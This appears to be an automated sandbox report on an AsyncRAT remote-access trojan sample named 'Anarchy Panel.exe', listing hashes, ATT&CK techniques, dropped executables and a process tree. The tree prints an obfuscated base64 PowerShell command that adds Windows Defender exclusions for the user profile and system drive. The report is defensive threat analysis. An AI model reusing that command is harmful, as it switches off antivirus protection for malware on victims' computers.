asyncrat | f5c6fde50262017b259d357a1e586c6c3f6e9d8c95ccd88beef08f64b6b99407

Analysis

max time kernel
146s
max time network
204s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
25-07-2024 14:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Anarchy Panel.exe
Size

60.8MB
MD5

c0eb5b0616dad08c48a21f840bf9e2bc
SHA1

f41c0747386053e1eb32d710d360a08c35de10c2
SHA256

d13fc809b467a28598451093bff3f9649a96082e041e775f174c55d5eadd7cc5
SHA512

bfdf7ed57ab450f19748b207ab542136a9c836c4ad174fbf507df3aae7a69acb710a0d66a85d5ec6a6c6b23363fd6ef559a0096d12fbfa322cb4970f4db572b4
SSDEEP

1572864:nWEhJfOrr878YLP5X3xCZubIX6+3gl7Mqui:xJfE+rP5HS2h9o

Score

10^/10

asyncrat defense_evasion discovery rat upx

Malware Config

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/memory/3608-36-0x0000000000810000-0x0000000003EAE000-memory.dmp	net_reactor

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	Anarchy Panel.exe

Executes dropped EXE 2 IoCs

pid	Process
1388	windowssdk.exe
3608	AnarchyBuilder.exe

Loads dropped DLL 1 IoCs

pid	Process
3608	AnarchyBuilder.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0002000000022ab9-6.dat	upx
behavioral2/memory/1388-8-0x00007FF646880000-0x00007FF647007000-memory.dmp	upx
behavioral2/memory/1388-69-0x00007FF646880000-0x00007FF647007000-memory.dmp	upx
behavioral2/memory/1388-75-0x00007FF646880000-0x00007FF647007000-memory.dmp	upx

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\windowssdk.exe	Anarchy Panel.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Anarchy Panel.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
968	powershell.exe
968	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	968	powershell.exe
Token: SeDebugPrivilege	3608	AnarchyBuilder.exe

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 2000 wrote to memory of 968	2000	Anarchy Panel.exe	86
PID 2000 wrote to memory of 968	2000	Anarchy Panel.exe	86
PID 2000 wrote to memory of 968	2000	Anarchy Panel.exe	86
PID 2000 wrote to memory of 1388	2000	Anarchy Panel.exe	88
PID 2000 wrote to memory of 1388	2000	Anarchy Panel.exe	88
PID 2000 wrote to memory of 3608	2000	Anarchy Panel.exe	89
PID 2000 wrote to memory of 3608	2000	Anarchy Panel.exe	89

C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe
"C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2000
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAbgB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAagBxACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGwAZABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAagByACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:968
- C:\Windows\windowssdk.exe
  "C:\Windows\windowssdk.exe"
  2⤵
  - Executes dropped EXE
  PID:1388
- C:\Users\Admin\AppData\Local\Temp\AnarchyBuilder.exe
  "C:\Users\Admin\AppData\Local\Temp\AnarchyBuilder.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:3608

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Costura\C5730A4C0FDD612A5678E51A536CE09E\64\sqlite.interop.dll

Filesize
1.7MB

MD5
56a504a34d2cfbfc7eaa2b68e34af8ad

SHA1
426b48b0f3b691e3bb29f465aed9b936f29fc8cc

SHA256
9309fb2a3f326d0f2cc3f2ab837cfd02e4f8cb6b923b3b2be265591fd38f4961

SHA512
170c3645083d869e2368ee16325d7edaeba2d8f1d3d4a6a1054cfdd8616e03073772eeae30c8f79a93173825f83891e7b0e4fd89ef416808359f715a641747d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5vzhlav1.1zi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\windowssdk.exe

Filesize
6.2MB

MD5
e58b6dba9e96f3f015010a7796676153

SHA1
bae94a6035fe295f803c12b7dbc85cac2bf120a0

SHA256
9e8a91ecf50a0e4d9cda2f80380345d8edba197551a2bc5c797cb43007fd8181

SHA512
1b357abde0a7fa9dca1e4cb1d15f250800bedf80faa25b8b211f51527484af392ae9d6b47fa6c512eea42124f523654ba92ac6e40aa15fc71d5c98cbfbbdbe59

Download Submit
memory/968-48-0x0000000006DD0000-0x0000000006DEE000-memory.dmp

Filesize
120KB

Download
memory/968-60-0x0000000007D50000-0x0000000007D61000-memory.dmp

Filesize
68KB

Download
memory/968-49-0x00000000079F0000-0x0000000007A93000-memory.dmp

Filesize
652KB

Download
memory/968-14-0x0000000005750000-0x0000000005772000-memory.dmp

Filesize
136KB

Download
memory/968-20-0x00000000061D0000-0x0000000006236000-memory.dmp

Filesize
408KB

Download
memory/968-19-0x0000000006160000-0x00000000061C6000-memory.dmp

Filesize
408KB

Download
memory/968-10-0x0000000003230000-0x0000000003266000-memory.dmp

Filesize
216KB

Download
memory/968-26-0x0000000006240000-0x0000000006594000-memory.dmp

Filesize
3.3MB

Download
memory/968-31-0x0000000006820000-0x000000000683E000-memory.dmp

Filesize
120KB

Download
memory/968-32-0x00000000068B0000-0x00000000068FC000-memory.dmp

Filesize
304KB

Download
memory/968-50-0x0000000008190000-0x000000000880A000-memory.dmp

Filesize
6.5MB

Download
memory/968-37-0x0000000006DF0000-0x0000000006E22000-memory.dmp

Filesize
200KB

Download
memory/968-38-0x000000006FE50000-0x000000006FE9C000-memory.dmp

Filesize
304KB

Download
memory/968-9-0x00000000735CE000-0x00000000735CF000-memory.dmp

Filesize
4KB

Download
memory/968-12-0x0000000005A90000-0x00000000060B8000-memory.dmp

Filesize
6.2MB

Download
memory/968-68-0x00000000735C0000-0x0000000073D70000-memory.dmp

Filesize
7.7MB

Download
memory/968-11-0x00000000735C0000-0x0000000073D70000-memory.dmp

Filesize
7.7MB

Download
memory/968-52-0x0000000007BC0000-0x0000000007BCA000-memory.dmp

Filesize
40KB

Download
memory/968-65-0x0000000007DD0000-0x0000000007DD8000-memory.dmp

Filesize
32KB

Download
memory/968-64-0x0000000007E80000-0x0000000007E9A000-memory.dmp

Filesize
104KB

Download
memory/968-58-0x0000000007DE0000-0x0000000007E76000-memory.dmp

Filesize
600KB

Download
memory/968-63-0x0000000007DA0000-0x0000000007DB4000-memory.dmp

Filesize
80KB

Download
memory/968-51-0x0000000007B50000-0x0000000007B6A000-memory.dmp

Filesize
104KB

Download
memory/968-62-0x0000000007D90000-0x0000000007D9E000-memory.dmp

Filesize
56KB

Download
memory/1388-8-0x00007FF646880000-0x00007FF647007000-memory.dmp

Filesize
7.5MB

Download
memory/1388-75-0x00007FF646880000-0x00007FF647007000-memory.dmp

Filesize
7.5MB

Download
memory/1388-69-0x00007FF646880000-0x00007FF647007000-memory.dmp

Filesize
7.5MB

Download
memory/3608-61-0x0000000020750000-0x0000000020B10000-memory.dmp

Filesize
3.8MB

Download
memory/3608-59-0x0000000020160000-0x0000000020748000-memory.dmp

Filesize
5.9MB

Download
memory/3608-57-0x0000000005E60000-0x0000000005E72000-memory.dmp

Filesize
72KB

Download
memory/3608-36-0x0000000000810000-0x0000000003EAE000-memory.dmp

Filesize
54.6MB

Download